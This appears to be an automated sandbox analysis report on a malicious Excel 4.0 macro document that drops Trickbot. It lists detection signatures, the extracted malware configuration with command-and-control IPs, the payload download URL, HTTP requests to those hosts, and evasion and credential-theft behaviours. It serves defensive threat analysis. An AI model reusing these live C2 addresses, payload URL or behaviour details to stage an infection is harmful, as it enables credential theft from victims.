Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095 (renamed file extension from 23095 to xls)
Analysis ID: 355598
MD5: 35ca616a3d685b7d1708eb901841879c
SHA1: b5073681d9bc3885987ee74ec1325d96152c46f0
SHA256: b9e1d6f26440468f142642382047529f94536f9601f4ffa70917c1b3ccac69e7

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Hijacks the control flow in another process
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php Avira URL Cloud: Label: malware
Found malware configuration
Source: wermgr.exe.2408.6.memstr Malware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", "154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", "109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], "modules": ["pwgrab", "mcconf"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls Virustotal: Detection: 11% Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls ReversingLabs: Detection: 27%
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007BCA0 CryptAcquireContextW, 6_2_0007BCA0
Source: C:\Windows\System32\svchost.exe Code function: 10_2_000000018008B68C CryptUnprotectData, 10_2_000000018008B68C

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2095142044.000000006E169000.00000002.00020000.sdmp
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061290 FindFirstFileW,FindNextFileW, 6_2_00061290
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW, 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW, 6_2_0007FBB0

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 10[1].jjkes.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Jump to behavior
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 47MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00072C50
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000784E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h 6_2_00061500
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ecx, word ptr [eax+02h] 6_2_00069200
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ecx, 00004E20h 6_2_00082659
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx edx, word ptr [eax] 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc dword ptr [esp+40h] 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ecx 6_2_0007B050
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00073860
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec ecx 6_2_00081890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00081890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000698D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 6_2_000624E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_0006E9E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00065DF0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx eax, byte ptr [ebx] 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 6_2_0007B240
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000772A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc edx 6_2_0006BEC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ebx, word ptr [eax] 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ebx, edx 6_2_0006EBE0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.chipmania.it
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 94.140.114.136:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.22:49166 -> 94.140.114.136:443
Source: Traffic Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49170 -> 193.8.194.96:443
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49170
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49174 -> 185.109.54.99:447
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49175
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49178
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49179
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 116.68.162.92:443
Source: Malware configuration extractor IPs: 190.239.34.181:443
Source: Malware configuration extractor IPs: 154.0.134.130:443
Source: Malware configuration extractor IPs: 187.95.136.38:443
Source: Malware configuration extractor IPs: 123.231.180.130:443
Source: Malware configuration extractor IPs: 109.69.4.201:443
Source: Malware configuration extractor IPs: 45.184.189.34:443
Source: Malware configuration extractor IPs: 193.8.194.96:443
May check the online IP address of the machine
Source: unknown DNS query: name: wtfismyip.com
Source: unknown DNS query: name: wtfismyip.com
Source: unknown DNS query: name: wtfismyip.com
Source: unknown DNS query: name: wtfismyip.com
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 11
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.109.54.99:447
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.81.0.78 185.81.0.78
Source: Joe Sandbox View IP Address: 193.8.194.96 193.8.194.96
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LINTASARTA-AS-APNetworkAccessProviderandInternetServic LINTASARTA-AS-APNetworkAccessProviderandInternetServic
Source: Joe Sandbox View ASN Name: TelefonicadelPeruSAAPE TelefonicadelPeruSAAPE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGIConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 116.68.162.92:443Content-Length: 282Cache-Control: no-cache
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.71.0Host: wtfismyip.com
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: www.chipmania.it
Source: unknown HTTP traffic detected: POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGIConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 116.68.162.92:443Content-Length: 282Cache-Control: no-cache
Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp String found in binary or memory: Https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://109.69.4.201:443
Source: wermgr.exe, 00000006.00000002.2362068163.0000000032D8C000.00000004.00000040.sdmp, wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://116.68.162.92:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://123.231.180.130:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://154.0.134.130:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://187.95.136.38:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://190.239.34.181:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://45.184.189.34:443
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp String found in binary or memory: http://crl.use
Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp String found in binary or memory: http://logo.veri
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2363434960.0000000034070000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.e